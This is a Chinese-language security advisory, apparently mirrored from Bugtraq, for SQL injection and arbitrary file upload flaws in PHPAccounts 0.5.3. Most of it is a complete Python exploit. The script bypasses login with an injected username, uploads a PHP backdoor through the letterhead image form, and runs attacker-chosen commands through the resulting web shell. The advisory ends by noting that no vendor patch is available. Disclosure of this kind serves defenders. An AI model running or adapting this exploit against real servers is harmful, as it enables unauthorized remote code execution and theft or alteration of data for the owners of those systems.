PHPAccounts SQL注入和任意文件上传漏洞

发布日期:2012-06-11
更新日期:2012-06-21

受影响系统:
phpaccounts phpaccounts
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 53920

PHPAccounts是针对小型企业、自由职业者、咨询公司的简单的基于Web的账号应用。

PHPAccounts中存在SQL注入漏洞和任意文件上传漏洞,这些漏洞源于未验证用户提供的数据。攻击者可利用该漏洞操控应用程序,执行任意代码,访问或修改数据,或在底层数据库中利用这些漏洞。

<*来源:loneferret
  *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

#!/usr/bin/python

import re, mechanize
import urllib, sys

print "\n[*] phpAcounts v.0.5.3 Remote Code Execution"
print "[*] Vulnerability discovered by loneferret"

print "[*] Offensive Security - http://www.offensive-security.com\n"
if (len(sys.argv) != 3):
    print "[*] Usage: poc.py <RHOST> <RCMD>"
    exit(0)

rhost = sys.argv[1]
rcmd = sys.argv[2]


print "[*] Bypassing Login ."
try:
        br = mechanize.Browser()
        br.open("http://%s/phpaccounts/index.php?frameset=true" % rhost)
        assert br.viewing_html()
        br.select_form(name="loginForm")
        br.select_form(nr=0)
        br.form['Login_Username'] = "x' or '1'#"
        br.form['Login_Password'] = "pwnd"
        print "[*] Triggering SQLi .."
        br.submit()
except:
        print "[*] Oups..Something happened"
        exit(0)

print "[*] Uploading Shell ..."
try:
        br.open("http://%s/phpaccounts/index.php?page=tasks&action=preferences" % rhost)
        assert br.viewing_html()
        br.select_form(nr=0)
        br.form["Preferences[LETTER_HEADER]"] = 'test'
        br.form.add_file(open('backdoor.php'), "text/plain", "backdoor.php", name="letterhead_image")
        br.submit(nr=2)
except:
        print "[*] Upload didn't work"
        exit(0)

print "[*] Command Executed\n"
try:
        shell = urllib.urlopen("http://%s/phpaccounts/users/1/backdoor.php?cmd=%s" % (rhost,rcmd))
        print shell.read()
except:
        print "[*] Oups."
        exit(0)

建议:
--------------------------------------------------------------------------------
厂商补丁:

phpaccounts
-----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://phpaccounts.com/

相关推荐